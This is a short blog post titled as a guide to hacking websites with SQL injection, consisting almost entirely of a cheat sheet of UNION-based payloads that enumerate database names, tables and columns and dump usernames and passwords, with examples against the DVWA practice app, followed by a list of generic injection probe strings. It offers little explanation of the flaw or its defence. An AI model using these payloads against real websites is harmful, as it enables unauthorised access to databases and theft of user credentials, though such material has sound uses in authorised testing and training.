What is SQL Injection - Hack Website with SQL Injection

2021-04-29 18:43:30 - Adil Khan

 

 


Basic Payload
' union select 1,2 -- 

Get Database Name
' union select database(),2 -- 

Get Username
 ' union select user(),null -- 

Get Databases
' union select distinct table_schema, null from information_schema.tables-- 

Get Tables
' union select null, TABLE_NAME from information_schema.tables where table_schema='DATABASE_NAME'-- 
Example
' union select null, TABLE_NAME from information_schema.tables where table_schema='dvwa'-- 

Get COLUMNS
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='DATABASE_NAME' AND TABLE_NAME='TABLE_NAME'-- 
Example
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='dvwa' AND TABLE_NAME='users'-- 

Get Data from Table
' union select username, password from DATABASE_NAME.TABLE_NAME -- 
Example
' union select username, password from dvwa.users -- 


Generic Payloads:
'
"
''
`
``
,
""
/
//

\
;
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/

SQL Injection Cheat Sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

More Posts

Smart farming
Real Time Surveillance Security & Attendance System (Fac...
Programming a Purpose Based Humanoid Robot
Supercapacitor-Lithium ion Hybrid Batteries based Drivetrain...
Nearby Informer